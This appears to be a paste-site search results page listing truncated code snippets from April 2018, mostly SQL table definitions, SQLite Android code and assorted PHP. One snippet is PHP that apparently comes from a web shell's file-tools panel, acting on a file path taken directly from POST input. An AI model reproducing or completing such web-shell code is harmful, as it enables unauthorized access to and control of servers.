42.7K results in 818 ms
8 years ago · Apr 22, 2018, 12:30 AM
Can't open the mysql.plugin table. Please run mysql_upgrade to create it. Aug 11 13:03:28
8 years ago · Apr 21, 2018, 11:24 PM
L 04/22/2018 - 00:32:49: Query CREATE TABLE IF NOT EXISTS `autoinviterv41` (`steam` varchar(64) NOT
8 years ago · Apr 21, 2018, 09:56 PM
drop database if exists clase3; create database clase3; use clase3; create table clientes( codigo int auto_increment,
8 years ago · Apr 21, 2018, 09:54 PM
NOT NULL, [Type] [nvarchar](50) NOT NULL ) GO if exists (select * from sysobjects where
8 years ago · Apr 21, 2018, 09:16 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Apr 21, 2018, 08:24 PM
USE `TP3` ; -- ----------------------------------------------------- -- Table `TP3`.`tblVille` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `TP3`.`tblVille` ( `idVille` INT NOT
8 years ago · Apr 21, 2018, 07:40 PM
BEGIN DROP TEMPORARY TABLE IF EXISTS tmp_all_search; create temporary table tmp_all_search(id INT(10) NOT NULL AUTO_INCREMENT, docid varchar(50),
8 years ago · Apr 21, 2018, 07:00 PM
USE `TP3` ; -- ----------------------------------------------------- -- Table `TP3`.`tblVille` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `TP3`.`tblVille` ( `idVille` INT NOT
8 years ago · Apr 21, 2018, 06:22 PM
IF EXISTS reces; DROP TABLE IF EXISTS meta; -- プレイヤーズã‚ャラクター CREATE TABLE avatars ( id INTEGER
8 years ago · Apr 21, 2018, 05:52 PM
queries here, It will not create if exists already db.execSQL( "CREATE TABLE DONOTREPEAT(ID INTEGER PRIMARY KEY
8 years ago · Apr 21, 2018, 05:46 PM
len(DD)!=2: DD='0'+DD dd=int(DD) mm=int(MM) if not (dd>0 and dd<=31): raise
8 years ago · Apr 21, 2018, 05:16 PM
DROP TABLE IF EXISTS `string`; CREATE TABLE `string` ( `name` varchar(64) NOT NULL DEFAULT '', `text` text, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; SET FOREIGN_KEY_CHECKS=1;
8 years ago · Apr 21, 2018, 04:44 PM
true); }ELSE{ $voters = array(); // create array } } mysqli_free_result($result); // re-validate the userID "is not" in array IF (!in_array($userid, $voters)) { // note the
8 years ago · Apr 21, 2018, 04:24 PM
parameters); } } class Schema { /** * Determine if the given table exists. * * @param string $table * @return
8 years ago · Apr 21, 2018, 03:30 PM
final String CREATE_TABLE_RECIPES = "CREATE TABLE IF NOT EXISTS " + TABLE_RECIPES + "(" + RECIPE_ID + " INTEGER PRIMARY
8 years ago · Apr 21, 2018, 03:00 PM
final String CREATE_TABLE_RECIPES = "CREATE TABLE IF NOT EXISTS " + TABLE_RECIPES + "(" + RECIPE_ID + " INTEGER PRIMARY
8 years ago · Apr 21, 2018, 02:38 PM
in the same table create table test ( role_name varchar2(200) not null primary key ) ; create
Total pages: 2134